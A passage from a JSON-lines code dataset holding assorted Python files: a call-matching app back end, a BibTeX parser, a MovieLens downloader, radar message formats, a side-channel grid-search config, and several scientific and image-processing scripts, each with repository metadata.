datetime.now()\n }\n db.tow.sessions.update({\"session_id\": request_data[\"session_id\"]}, {\"$set\": session_info})\n return {\"result\": \"ok\"}\n\n def __add_dictionary_keys_prefix(self, dictionary, prefix):\n result = {}\n for x in dictionary.keys():\n result[prefix + x] = dictionary[x]\n return result\n\n def __send_push_notification(self, mobile_id, text, data=None, use_sound=False):\n wrapper = APNSNotificationWrapper(\"/var/www/tow/cert/prod.pem\", sandbox=False)\n message = APNSNotification()\n message.token(binascii.unhexlify(mobile_id))\n message.alert(text)\n if use_sound:\n message.sound(\"ring.wav\")\n if data:\n message.appendProperty(APNSProperty(\"data\", json.dumps(data, cls=JsonSerializer)))\n wrapper.append(message)\n wrapper.notify()\n\n def __find_user_to_call(self, user_info, limit=1):\n query = \\\n {\n \"$and\": [{\"_id\": {\"$ne\": user_info[\"_id\"]}}, {\"settings.call_status\": \"available\"}]\n }\n global_settings = db.tow.settings.find_one()\n if not global_settings:\n global_settings = {}\n if global_settings.get(\"enable_exclude_friends\", False) is not False:\n if user_info[\"settings\"].get(\"exclude_fb_friends\", False) is not False:\n query[\"$and\"] = query[\"$and\"] + [{\"facebook_id\": {\"$ne\": long(x[\"id\"])}} for x in\n user_info.get(\"friends\", [])]\n if global_settings.get(\"enable_gender\", False) is not False:\n gender = user_info[\"settings\"].get(\"gender\", False)\n if gender is not False:\n if gender != \"both\":\n query[\"$and\"] = query[\"$and\"] + [{\"gender\": gender}]\n if global_settings.get(\"enable_age\", False) is not False:\n max_age = user_info[\"settings\"].get(\"maximum_age\", 999)\n min_age = user_info[\"settings\"].get(\"minimum_age\", 0)\n from_birthday = datetime.utcnow() - relativedelta(years=max_age)\n till_birthday = datetime.utcnow() - relativedelta(years=min_age)\n query[\"$and\"] = query[\"$and\"] + [{\"birthday\": {\"$gte\": from_birthday}},\n {\"birthday\": {\"$lte\": till_birthday}}]\n if global_settings.get(\"enable_distance\", False) is not False:\n max_distance = user_info[\"settings\"].get(\"maximum_distance\", 99999)\n if global_settings.get(\"enable_call_reuse\", True) is False:\n user_sessions_caller = list(db.tow.sessions.find({\"user_1\": user_info[\"_id\"], \"is_hanged_up\": True}))\n user_sessions_caller = [x[\"user_2\"] for x in user_sessions_caller]\n user_sessions_callee = list(db.tow.sessions.find({\"user_2\": user_info[\"_id\"], \"is_hanged_up\": True}))\n user_sessions_callee = [x[\"user_1\"] for x in user_sessions_callee]\n user_sessions = user_sessions_caller + user_sessions_callee\n query[\"$and\"] = query[\"$and\"] + [{\"_id\": {\"$ne\": x}} for x in user_sessions]\n if global_settings.get(\"enable_dual_match\", False) is not False:\n user_age = self.__calculate_user_age(user_info)\n user_gender = user_info[\"gender\"]\n query[\"$and\"] = query[\"$and\"] + [{\"settings.gender\": user_gender},\n {\"settings.maximum_age\": {\"$gte\": user_age}},\n {\"settings.minimum_age\": {\"$lte\": user_age}}]\n result = list(db.tow.users.find(query).sort(\"date_modified\", pymongo.DESCENDING))\n if not result:\n return None\n return result[0:limit]\n\n def __calculate_session_id(self, from_user_id, to_user_id):\n from_hash = jenkins.oneatatime(from_user_id)\n to_hash = jenkins.oneatatime(to_user_id)\n minimal = min(from_hash, to_hash)\n if minimal == from_hash:\n first = from_user_id\n second = to_user_id\n else:\n first = to_user_id\n second = from_user_id\n session_id = first + second\n return session_id\n\n def __insert_session(self, session_id, user_id_1, user_id_2):\n session_info = \\\n {\n \"session_id\": session_id,\n \"user_1\": user_id_1,\n \"user_2\": user_id_2,\n \"user_1_is_connected_to_twillio\": False,\n \"user_1_is_alive\": False,\n \"user_1_is_first_stage_ok\": False,\n \"user_1_is_second_stage_ok\": False,\n \"user_1_is_third_stage_ok\": False,\n \"user_1_is_hanged_up\": False,\n \"user_1_is_hold\": False,\n \"user_2_is_connected_to_twillio\": False,\n \"user_2_is_alive\": False,\n \"user_2_is_first_stage_ok\": False,\n \"user_2_is_second_stage_ok\": False,\n \"user_2_is_third_stage_ok\": False,\n \"user_2_is_hanged_up\": False,\n \"user_2_is_hold\": False,\n \"is_connected_to_twillio\": False,\n \"is_alive\": False,\n \"is_first_stage_ok\": False,\n \"is_second_stage_ok\": False,\n \"is_third_stage_ok\": False,\n \"is_hanged_up\": False,\n \"is_hold\": False,\n \"date_created\": datetime.utcnow(),\n \"date_modified\": datetime.utcnow()\n }\n db.tow.sessions.insert(session_info)\n\n def __reset_session(self, session_id, user_id_1, user_id_2):\n session_info = \\\n {\n \"session_id\": session_id,\n \"user_1\": user_id_1,\n \"user_2\": user_id_2,\n \"user_1_is_connected_to_twillio\": False,\n \"user_1_is_alive\": False,\n \"user_1_is_first_stage_ok\": False,\n \"user_1_is_second_stage_ok\": False,\n \"user_1_is_third_stage_ok\": False,\n \"user_1_is_hanged_up\": False,\n \"user_1_is_hold\": False,\n \"user_2_is_connected_to_twillio\": False,\n \"user_2_is_alive\": False,\n \"user_2_is_first_stage_ok\": False,\n \"user_2_is_second_stage_ok\": False,\n \"user_2_is_third_stage_ok\": False,\n \"user_2_is_hanged_up\": False,\n \"user_2_is_hold\": False,\n \"is_connected_to_twillio\": False,\n \"is_alive\": False,\n \"is_first_stage_ok\": False,\n \"is_second_stage_ok\": False,\n \"is_third_stage_ok\": False,\n \"is_hanged_up\": False,\n \"is_hold\": False,\n \"date_modified\": datetime.utcnow()\n }\n db.tow.sessions.update({\"session_id\": session_id}, {\"$set\": session_info})\n\n def __calculate_user_age(self, user_info):\n today = date.today()\n try:\n birthday = date(today.year, user_info[\"birthday\"].month, user_info[\"birthday\"].day)\n except ValueError:\n birthday = date(today.year, user_info[\"birthday\"].month, user_info[\"birthday\"].day - 1)\n if birthday > today:\n user_age = today.year - user_info[\"birthday\"].year - 1\n else:\n user_age = today.year - user_info[\"birthday\"].year\n return user_age\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"providers/business_provider.py","file_name":"business_provider.py","file_ext":"py","file_size_in_byte":21790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"595552685","text":"import re\nfrom refcliq.util import cleanCurlyAround\n\n_firstLinePattern = re.compile(r\"@(?P<kind>.*?){([\\s]*(?P<id>[^,\\s]+),)\")\n_fieldPattern = re.compile(\n r\"(?P<name>[\\w-]+?)[\\s]*=[\\s]*({(?P<content>.*)})\", flags=re.IGNORECASE | re.DOTALL)\n\n\ndef parse(bibfile: str, keepOnly: list = None) -> dict:\n \"\"\"\n bibfile: path to a .bib file.\n\n Returns: a dictionary where the keys are the entry IDs and the content are\n the entries, using the same fields.\n\n If keepOnly is not None, only returns those fields.\n \"\"\"\n ret = {}\n with open(bibfile, 'r', encoding=\"utf-8\") as fin:\n currentEntry = None\n for line in fin:\n match = _firstLinePattern.search(line)\n if (match):\n currentEntry = match.group(\"id\")\n ret[currentEntry] = {}\n currentField = ''\n openBraces = 0\n continue\n # blank spaces/lines, preambles, etc\n if (currentEntry is None):\n continue\n openBraces += (line.count('{')-line.count('}'))\n currentField = currentField+line\n if openBraces > 0:\n continue\n else:\n match = _fieldPattern.search(currentField)\n if (match):\n name = match.group(\"name\")\n if (name is not None) and ((keepOnly is None) or (name in keepOnly)):\n content = cleanCurlyAround(\n match.group(\"content\")).strip()\n ret[currentEntry][match.group(\"name\")] = content\n currentField = ''\n\n return(ret)\n","sub_path":"src/refcliq/bibtex.py","file_name":"bibtex.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"332144900","text":"import requests\nimport zipfile\nimport os\n\ndef download_dataset():\n url = 'http://files.grouplens.org/datasets/movielens/ml-latest-small.zip'\n zipped_data = requests.get(url)\n with open('ml-latest-small.zip', 'wb') as outfile:\n outfile.write(zipped_data.content)\n return os.path.join(os.getcwd(), 'ml-latest-small.zip')\n\ndef unzip_file(file_path, destination_path):\n '''Simple function that takes path to zip file, unzips it and removes .zip'''\n zip_ref = zipfile.ZipFile(file_path, 'r')\n zip_ref.extractall(destination_path)\n zip_ref.close()\n os.remove(file_path)\n\nif __name__ == \"__main__\":\n file_path = download_dataset()\n unzip_file(file_path, os.getcwd())","sub_path":"movies/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"113355596","text":"#!/usr/bin/env python3\ndef orderBeer(age, beersHad):\n if age < 16:\n print(f'Get outta here. You are only {age} y.o.')\n elif beersHad > 5:\n print(f'Go home! You are drunk, you had {beersHad} beers dude.')\n else:\n beersHad += 1\n print(f'Here is your beer. Enjoy!')\n return beersHad\n","sub_path":"beers.py","file_name":"beers.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"158209248","text":"import numpy as np,matplotlib.pyplot as plt\r\nimport time\r\n\r\n#start = time.time()\r\n#e_time = np.array([])\r\n\r\nmu , sigma = 0 , 0.005 #ノイズパラメータ\r\nepsilon , length = 1.0 , 35.0 #実験系パラメータ\r\ndiffusivity = 1.5 # ターゲットパラメータ\r\n\r\nd_e = np.round(np.linspace(1.0,3.0,2),2) #パラメータ探索範囲\r\nk_a = np.round(np.linspace(-1,1,3),2)\r\n\r\n\r\n#以下,関数定義\r\n###############################################################################\r\n\r\ndef reader(mu , sigma , epsilon , length , diffusivity):\r\n folder = f\"./mu={mu},sigma={sigma}/\"\r\n file = folder+f\"artificial_data_De={diffusivity}_length={length}_epsilon={epsilon}_mu={mu}_sigma={sigma}.dat\"\r\n\r\n dimensional_time = np.array([])\r\n dimensional_flow = np.array([])\r\n #count = 0\r\n for line in open(file,\"r\"):\r\n data = line.split(\"\\t\")\r\n dimensional_time = np.append(dimensional_time,float(data[0]))\r\n dimensional_flow = np.append(dimensional_flow,float(data[1]))\r\n #print(dimensional_time,dimensional_flow)\r\n # count += 1\r\n # if count==1000:\r\n # break\r\n\r\n return dimensional_time , dimensional_flow# , count\r\n\r\ndef dimensionless(dimensional_time , dimensional_flow , diffusivity=diffusivity, epsilon=epsilon , length=length):\r\n dimensionless_time = np.array([])\r\n dimensionless_flow = np.array([])\r\n dimensionless_time = ( diffusivity/(epsilon*np.power(length,2)) )*dimensional_time\r\n dimensionless_flow = ( (epsilon*np.power(length,2))/diffusivity )*dimensional_flow\r\n\r\n return dimensionless_time , dimensionless_flow\r\n\r\ndef standard_diffusion_curve(dimensionless_time,k_a):\r\n sdc = np.array([])\r\n for time in dimensionless_time:\r\n exit_flow = 0.0\r\n for n in range(100):\r\n exit_flow += np.pi*np.power(-1,n)*(2*n+1)*np.exp(-np.power(n+0.5,2)*np.power(np.pi,2)*time)\r\n exit_flow *= np.exp(-k_a*time)\r\n sdc = np.append(sdc,exit_flow)\r\n\r\n return sdc\r\n\r\ndef method_of_least_squares(dimensionless_flow, sdc):\r\n error = 0.0\r\n for artificial_data , standard_diffusion_curve in zip(dimensionless_flow,sdc):\r\n error += np.power(artificial_data - standard_diffusion_curve,2)\r\n\r\n return error\r\n\r\ndef file_writer(d_e , k_a , squared_error):\r\n #file = f\"./mu={mu},sigma={sigma}/squared_error_De={diffusivity}_length={length}_epsilon={epsilon}_mu={mu}_sigma={sigma}.dat\"\r\n file = \"sample.dat\"\r\n with open(file,\"w\") as fileobj:\r\n for i in range(len(d_e)):\r\n for j in range(len(k_a)):\r\n fileobj.write(str(d_e[i]))\r\n fileobj.write(\"\\t\")\r\n fileobj.write(str(k_a[j]))\r\n fileobj.write(\"\\t\")\r\n fileobj.write(str(squared_error[i,j]))\r\n fileobj.write(\"\\n\")\r\n fileobj.write(\"\\n\")\r\n\r\n return None\r\n\r\ndef graph_plot(d_e , squared_error):\r\n folder = f\"./mu={mu},sigma={sigma}/\"\r\n file = folder+f\"squared_error_De={diffusivity}_length={length}_epsilon={epsilon}_mu={mu}_sigma={sigma}.png\"\r\n plt.plot(d_e,squared_error)\r\n plt.xlabel(\"Diffusivity[$mm^2/ms$]\")\r\n plt.ylabel(\"Squared Error\")\r\n plt.grid(True)\r\n plt.savefig(file)\r\n plt.show()\r\n\r\n return None\r\n\r\n###############################################################################\r\n\r\n\r\ndimensional_time , dimensional_flow = reader(mu=mu,sigma=sigma,epsilon=epsilon,length=length,diffusivity=diffusivity)\r\n\r\nsquared_error = np.array([])\r\n\r\nfor d in d_e:\r\n for ka in k_a:\r\n dimensionless_time , dimensionless_flow = dimensionless(diffusivity=d,dimensional_time=dimensional_time,dimensional_flow=dimensional_flow)\r\n sdc = standard_diffusion_curve(dimensionless_time=dimensionless_time , k_a = ka)\r\n error = method_of_least_squares(dimensionless_flow=dimensionless_flow , sdc=sdc)\r\n squared_error = np.append(squared_error,error)\r\n\r\n # step = time.time()\r\n # elapsed_time = step-start\r\n # e_time = np.append(e_time,elapsed_time)\r\n\r\nsquared_error = squared_error.reshape(len(d_e) , len(k_a))\r\n\r\nfile_writer(d_e=d_e , k_a=k_a , squared_error=squared_error)\r\n\r\n#graph_plot(d_e=d_e , squared_error=squared_error)\r\n\r\n# end = time.time()\r\n# elapsed_time = end - start\r\n# e_time = np.append(e_time,elapsed_time)\r\n# print(f\"elapsed time : {elapsed_time}[sec]\")\r\n\r\n#plt.plot(e_time)\r\n#plt.show()\r\n\r\n# for i in range(count):\r\n# print(\"time[\"+str(i)+\"]=\",dimensional_time[i],\"flow[\"+str(i)+\"]=\",dimensional_flow[i])\r\n# print(\"d_time[\"+str(i)+\"]=\",dimensionless_time[i],\"d_flow[\"+str(i)+\"]=\",dimensionless_flow[i])\r\n# print(\"d_time[\"+str(i)+\"]=\",dimensionless_time[i],\"sdc[\"+str(i)+\"]=\",sdc[i])\r\n# print(\"\\n\")\r\n\r\n#print(squared_error)\r\n\r\n#graph_plot(dimensionless_time=dimensionless_time , dimensionless_flow=dimensionless_flow , sdc=sdc)\r\n","sub_path":"method_of_least_squares_IRmodel.py","file_name":"method_of_least_squares_IRmodel.py","file_ext":"py","file_size_in_byte":4834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"3240450","text":"#!/usr/bin/env python3\n\"\"\"Calculate the probability density function of Gaussian distribution\"\"\"\nimport numpy as np\n\n\ndef pdf(X, m, S):\n \"\"\"Calculate the probability density function of Gaussian distribution\n @X: np.ndarray shape(n,d) data points whose PDF should be evaluated\n @m: np.ndarray shape(d,) mean of distribution\n @S: np.ndarray shape(d,d) covariance of the distribution\n Return: P or None on failure\n @P: np.ndarray of shape(n,) the PDF values for each data point\n \"\"\"\n if not isinstance(X, np.ndarray) or len(X.shape) != 2:\n return None\n if not isinstance(m, np.ndarray) or len(m.shape) != 1:\n return None\n if not isinstance(S, np.ndarray) or len(S.shape) != 2:\n return None\n d = X.shape[1]\n if m.shape[0] != d or S.shape[0] != S.shape[1] or S.shape[0] != d:\n return None\n det = np.linalg.det(S)\n p1 = 1 / ((2 * np.pi) ** (d / 2) * det ** 0.5)\n Xm = X - m\n X_t = np.linalg.inv(S) @ Xm.T\n\n p2 = np.exp(-0.5 * np.sum(Xm * X_t.T, axis=1))\n P = p1 * p2.T\n return np.where(P <= 1e-300, 1e-300, P)\n","sub_path":"unsupervised_learning/0x01-clustering/5-pdf.py","file_name":"5-pdf.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"25355522","text":"import aisy_sca\nfrom app import *\n\naisy = aisy_sca.Aisy()\naisy.set_resources_root_folder(resources_root_folder)\naisy.set_database_root_folder(databases_root_folder)\naisy.set_datasets_root_folder(datasets_root_folder)\naisy.set_database_name(\"database_ascad.sqlite\")\naisy.set_dataset(datasets_dict[\"ascad-variable.h5\"])\naisy.set_aes_leakage_model(leakage_model=\"HW\", byte=2)\naisy.set_batch_size(400)\naisy.set_epochs(20)\n\n# for each hyper-parameter, specify the options in the grid search\ngrid_search = {\n \"neural_network\": \"cnn\",\n \"hyper_parameters_search\": {\n 'conv_layers': [1, 2],\n 'kernel_1': [4, 8],\n 'kernel_2': [2, 4],\n 'stride_1': [1],\n 'stride_2': [1],\n 'filters_1': [8, 16],\n 'filters_2': [8, 16],\n 'pooling_type_1': [\"Average\", \"Max\"],\n 'pooling_type_2': [\"Average\", \"Max\"],\n 'pooling_size_1': [1, 2],\n 'pooling_size_2': [1, 2],\n 'pooling_stride_1': [1, 2],\n 'pooling_stride_2': [1, 2],\n 'neurons': [100, 200],\n 'layers': [3, 4],\n 'learning_rate': [0.001],\n 'activation': [\"selu\", \"elu\"],\n 'optimizer': [\"Adam\", \"SGD\"]\n },\n \"metric\": \"guessing_entropy\",\n \"stop_condition\": False,\n \"stop_value\": 1.0,\n \"train_after_search\": True\n}\n\naisy.run(\n grid_search=grid_search,\n key_rank_attack_traces=500\n)\n","sub_path":"scripts/script_aes_grid_search.py","file_name":"script_aes_grid_search.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"424507908","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"PulsON 440 message formats.\"\"\"\n\n__author__ = \"Ramamurthy Bhagavatula\"\n__version__ = \"1.0\"\n__maintainer__ = \"Ramamurthy Bhagavatula\"\n__email__ = \"ramamurthy.bhagavatula@ll.mit.edu\"\n\n\"\"\"References\n[1] Monostatic Radar Application Programming Interface (API) Specification\n PulsON (R) 400 Series\n Version: 1.2.2\n Date: January 2015\n https://timedomain.com/wp-content/uploads/2015/12/320-0298E-MRM-API-Specification.pdf\n\"\"\"\n\n# Import required modules and methods\nfrom collections import OrderedDict\nimport numpy as np\nfrom pulson440.constants import REC_ANTENNA_MODE, REC_PERSIST_FLAG, REC_SCAN_RES, RESERVED_VAL, \\\n NOT_IMPLEMENTED_VAL\n\n# Formats of various messages between host and radar. Each one is defined by a message type and a \n# packet definition. A packet definition is an order dictionary specifying the order of the packet\n# fields. The values in these dictionaries depend on whether the message is for host to radar \n# messages or for radar to host messages.\n# \n# For host to radar messages each key's value is a 2 element list where the first element is the \n# data type and the second value is the default value. If the default value is None then this part \n# of the packet must be user defined otherwise the default value is used.\n#\n# For radar to host messages each key's value is the data type. This difference in format is to \n# ensure the right message format is used for the right direction of communication.\n\n# Set radar configuration request; host to radar\nMRM_SET_CONFIG_REQUEST = {'message_type': 4097, # Message type\n 'packet_def': OrderedDict([\n ('message_type', [np.dtype(np.uint16), None]), # Message type\n ('message_id', [np.dtype(np.uint16), None]), # Message ID\n ('node_id', [np.dtype(np.uint32), None]), # Node ID\n ('scan_start', [np.dtype(np.int32), None]), # Scan start time (ps)\n ('scan_stop', [np.dtype(np.int32), None]), # Scan stop time (ps)\n ('scan_res', [np.dtype(np.uint16), REC_SCAN_RES]), # Scan resolution (bins); recommended value used\n ('pii', [np.dtype(np.uint16), None]), # Pulse integration index\n ('seg_1_samp', [np.dtype(np.uint16), NOT_IMPLEMENTED_VAL]), # Segment 1 samples; not used\n ('seg_2_samp', [np.dtype(np.uint16), NOT_IMPLEMENTED_VAL]), # Segment 2 samples; not used\n ('seg_3_samp', [np.dtype(np.uint16), NOT_IMPLEMENTED_VAL]), # Segment 3 samples; not used\n ('seg_4_samp', [np.dtype(np.uint16), NOT_IMPLEMENTED_VAL]), # Segment 4 samples; not used\n ('seg_1_int', [np.dtype(np.uint8), NOT_IMPLEMENTED_VAL]), # Segment 1 integration; not used\n ('seg_2_int', [np.dtype(np.uint8), NOT_IMPLEMENTED_VAL]), # Segment 2 integration; not used\n ('seg_3_int', [np.dtype(np.uint8), NOT_IMPLEMENTED_VAL]), # Segment 3 integration; not used\n ('seg_4_int', [np.dtype(np.uint8), NOT_IMPLEMENTED_VAL]), # Segment 4 integration; not used\n ('ant_mode', [np.dtype(np.uint8), REC_ANTENNA_MODE]), # Antenna mode; recommended value used\n ('tx_gain_ind', [np.dtype(np.uint8), None]), # Transmit gain index\n ('code_channel', [np.dtype(np.uint8), None]), # Code channel\n ('persist_flag', [np.dtype(np.uint8), REC_PERSIST_FLAG])])} # Persist flag\nMRM_SET_CONFIG_REQUEST['packet_length'] = sum( # Packet length (bytes))\n [value[0].itemsize for value in MRM_SET_CONFIG_REQUEST['packet_def'].values()])\n\n# Set radar configuration confirmation; radar to host\nMRM_SET_CONFIG_CONFIRM = {'message_type': 4353, # Message type\n 'packet_def': OrderedDict([\n ('message_type', np.dtype(np.uint16)), # Message type\n ('message_id', np.dtype(np.uint16)), # Message ID\n ('status', np.dtype(np.uint32))])} # Set configuration status\nMRM_SET_CONFIG_CONFIRM['packet_length'] = sum( # Packet length (bytes))\n [value.itemsize for value in MRM_SET_CONFIG_CONFIRM['packet_def'].values()])\n\n# Get radar configuration request; host to radar\nMRM_GET_CONFIG_REQUEST = {'message_type': 4098, # Message type\n 'packet_def': OrderedDict([\n ('message_type', [np.dtype(np.uint16), None]), # Message type\n ('message_id', [np.dtype(np.uint16), None])])} # Message ID\nMRM_GET_CONFIG_REQUEST['packet_length'] = sum( # Packet length (bytes))\n [value[0].itemsize for value in MRM_GET_CONFIG_REQUEST['packet_def'].values()])\n\n# Set radar configuration request; radar to host\nMRM_GET_CONFIG_CONFIRM = {'message_type': 4354, # Message type\n 'packet_def': OrderedDict([\n ('message_type', np.dtype(np.uint16)), # Message type\n ('message_id', np.dtype(np.uint16)), # Message ID\n ('node_id', np.dtype(np.uint32)), # Node ID\n ('scan_start', np.dtype(np.int32)), # Scan start time (ps)\n ('scan_stop', np.dtype(np.int32)), # Scan stop time (ps)\n ('scan_res', np.dtype(np.uint16)), # Scan resolution (bins); recommended value used\n ('pii', np.dtype(np.uint16)), # Pulse integration index\n ('seg_1_samp', np.dtype(np.uint16)), # Segment 1 samples; not used\n ('seg_2_samp', np.dtype(np.uint16)), # Segment 2 samples; not used\n ('seg_3_samp', np.dtype(np.uint16)), # Segment 3 samples; not used\n ('seg_4_samp', np.dtype(np.uint16)), # Segment 4 samples; not used\n ('seg_1_int', np.dtype(np.uint8)), # Segment 1 integration; not used\n ('seg_2_int', np.dtype(np.uint8)), # Segment 2 integration; not used\n ('seg_3_int', np.dtype(np.uint8)), # Segment 3 integration; not used\n ('seg_4_int', np.dtype(np.uint8)), # Segment 4 integration; not used\n ('ant_mode', np.dtype(np.uint8)), # Antenna mode; recommended value used\n ('tx_gain_ind', np.dtype(np.uint8)), # Transmit gain index\n ('code_channel', np.dtype(np.uint8)), # Code channel\n ('persist_flag', np.dtype(np.uint8)), # Persist flag\n ('timestamp', np.dtype(np.uint32)), # Time since boot (ms)\n ('status', np.dtype(np.uint32))])} # Status\nMRM_GET_CONFIG_CONFIRM['packet_length'] = sum( # Packet length (bytes))\n [value.itemsize for value in MRM_GET_CONFIG_CONFIRM['packet_def'].values()])\n\n# Radar scan request; host to radar\nMRM_CONTROL_REQUEST = {'message_type': 4099, # Message type\n 'packet_def': OrderedDict([\n ('message_type', [np.dtype(np.uint16), None]), # Message type\n ('message_id', [np.dtype(np.uint16), None]), # Message ID\n ('scan_count', [np.dtype(np.uint16), None]), # Scan count\n ('reserved', [np.dtype(np.uint16), RESERVED_VAL]), # Reserved\n ('scan_interval', [np.dtype(np.uint32), None])])} # Scan interval (us)\nMRM_CONTROL_REQUEST['packet_length'] = sum( # Packet length (bytes))\n [value[0].itemsize for value in MRM_CONTROL_REQUEST['packet_def'].values()])\n\n# Radar scan confirm; radar to host\nMRM_CONTROL_CONFIRM = {'message_type': 4355, # Message type\n 'packet_def': OrderedDict([\n ('message_type', np.dtype(np.uint16)), # Message type\n ('message_id', np.dtype(np.uint16)), # Message ID\n ('status', np.dtype(np.uint32))])} # Status \nMRM_CONTROL_CONFIRM['packet_length'] = sum( # Packet length (bytes))\n [value.itemsize for value in MRM_CONTROL_CONFIRM['packet_def'].values()])\n\n# Radar reboot request; host to radar\nMRM_REBOOT_REQUEST = {'message_type': 61442, # Message type\n 'packet_def': OrderedDict([\n ('message_type', [np.dtype(np.uint16), None]), # Message type\n ('message_id', [np.dtype(np.uint16), None])])} # Message ID\nMRM_REBOOT_REQUEST['packet_length'] = sum( # Packet length (bytes))\n [value[0].itemsize for value in MRM_REBOOT_REQUEST['packet_def'].values()])\n\n# Radar reboot confirm; radar to host\nMRM_REBOOT_CONFIRM = {'message_type': 61698, # Message type\n 'packet_def': OrderedDict([\n ('message_type', np.dtype(np.uint16)), # Message type\n ('message_id', np.dtype(np.uint16))])} # Message ID\nMRM_REBOOT_CONFIRM['packet_length'] = sum( # Packet length (bytes))\n [value.itemsize for value in MRM_REBOOT_CONFIRM['packet_def'].values()])\n\n# Scan data; radar to host\nMRM_SCAN_INFO = {'message_type': 61953, # Message type\n 'packet_def': OrderedDict([\n ('message_type', np.dtype(np.uint16)), # Message type\n ('message_id', np.dtype(np.uint16)), # Message ID\n ('node_id', np.dtype(np.uint32)), # Node ID\n ('timestamp', np.dtype(np.uint32)), # Time since boot (ms)\n ('reserved0', np.dtype(np.uint32)), # Reserved\n ('reserved1', np.dtype(np.uint32)), # Reserved\n ('reserved2', np.dtype(np.uint32)), # Reserved\n ('reserved3', np.dtype(np.uint32)), # Reserved\n ('scan_start', np.dtype(np.int32)), # Scan start time (ps)\n ('scan_stop', np.dtype(np.int32)), # Scan stop time (ps)\n ('scan_res', np.dtype(np.int16)), # Scan resolution (bins)\n ('scan_type', np.dtype(np.uint8)), # Type of scan data\n ('reserved4', np.dtype(np.uint8)), # Reserved\n ('antenna_id', np.dtype(np.uint8)), # Receiving antenna designator\n ('operational_mode', np.dtype(np.uint8)), # Operational mode\n ('num_samples_message', np.dtype(np.uint16)), # Number of samples in this message\n ('num_samples_total', np.dtype(np.uint32)), # Number of samples in single scan\n ('message_index', np.dtype(np.uint16)), # Index of this message's portion of data in single scan\n ('num_messages_total', np.dtype(np.uint16)), # Number of data messages in single scan\n ('scan_data', np.dtype(np.int32))])} # Scan data\nMRM_SCAN_INFO['packet_length'] = sum( # Packet length (bytes))\n [value.itemsize for value in MRM_SCAN_INFO['packet_def'].values()])","sub_path":"raw_code/pulson440/formats.py","file_name":"formats.py","file_ext":"py","file_size_in_byte":11611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"513682230","text":"#!/usr/bin/env python\n\nfrom glob import glob\nimport nipype.interfaces.fsl as fsl\nimport os\n\nif __name__ == '__main__':\n\n try:\n taskid = os.environ['SGE_TASK_ID']\n except:\n raise IOError('Are you using SGE??')\n\n basedir = '/home/jagust/fmri-pstask/subjects/'\n subjects = sorted(glob(os.path.join(basedir, 'B*')))\n ysubjects = sorted(glob(os.path.join(basedir, 'young/B14*')))\n for y in ysubjects:\n subjects.append(y)\n\n subj = subjects[int(taskid)-1]\n _, sname = os.path.split(subj)\n roidir = os.path.join(subj, 'rois')\n if os.path.isdir(roidir):\n maskfiles = sorted(glob(os.path.join(roidir, 'PSE-0.75/subfields/*')))\n outfiles = sorted(glob(os.path.join(roidir, 'newmodel/template_space/*nii.gz')))\n for maskfile in maskfiles:\n _, rname = os.path.split(maskfile)\n name2, ext1, ext2 = rname.split('.')\n for outname in outfiles:\n _, oname = os.path.split(outname)\n name1, ext1, ext2 = oname.split('.')\n mname = '{}_{}'.format(name1, name2)\n maskoutname = os.path.join(roidir, 'newmodel/template_space/{}.nii.gz'.format(mname))\n mask = fsl.ApplyMask(in_file=outname, mask_file=maskfile, out_file=maskoutname)\n mask.run()\n for outfile in outfiles:\n os.remove(outfile)\n","sub_path":"extract_mean_func.py","file_name":"extract_mean_func.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"481888617","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 31 00:55:38 2014\n\n@author: Ankur\n\"\"\"\n\n\nimport numpy as np\nimport scipy\nimport matplotlib.pyplot as plt\n\n\nclass PhaseImportance():\n \n def __init__(self,filename1=None,filename2=None):\n if filename1 is None or filename2 is None:\n raise Exception(\"filename not given as first param\")\n \n self.image1 = scipy.misc.imread(filename1)\n self.image2 = scipy.misc.imread(filename2)\n \n self.G = None\n self.H = None\n self.K = None\n self.centerG = None\n self.centerH = None\n \n def run(self):\n self.calculate_fft()\n \n \n def calculate_fft(self):\n #take transform and bring it to origin\n self.G = np.fft.fft2(self.image1)\n self.centerG = np.fft.fftshift(self.G)\n \n #take transform and bring it to origin\n self.H = np.fft.fft2(self.image2)\n self.centerH = np.fft.fftshift(self.H)\n \n self.construct_wave()\n \n def construct_wave(self):\n \n phase = self.find_phase() \n magnitude = self.magnitude()\n\n #re = magnitude/np.sqrt(1+np.square(np.tan(phase)))\n re = magnitude*np.cos(phase)\n im = magnitude*np.sin(phase)\n \n final_wave = re + 1j*im\n\n finimage = np.abs(np.fft.ifft2(final_wave))\n self.save_image(\"task1_3.jpg\",finimage)\n \n #plotting functions\n plt.subplot(221),plt.imshow(finimage, cmap = 'gray')\n plt.xticks([]), plt.yticks([])\n plt.title(\"Final-Image\")\n plt.show()\n \n def magnitude(self):\n return np.abs(self.centerG)\n \n def find_phase(self):\n #this is in radians\n return np.angle(self.centerH)\n \n def save_image(self,name,imarray):\n scipy.misc.imsave(name,imarray)\n\nif __name__ == \"__main__\":\n obj = PhaseImportance(\"bauckhage.jpg\",\"clock.jpg\")\n obj.run()","sub_path":"project1/task_1.3/task1_3.py","file_name":"task1_3.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"293441660","text":"import pandas as pd\nimport numpy as np\nimport 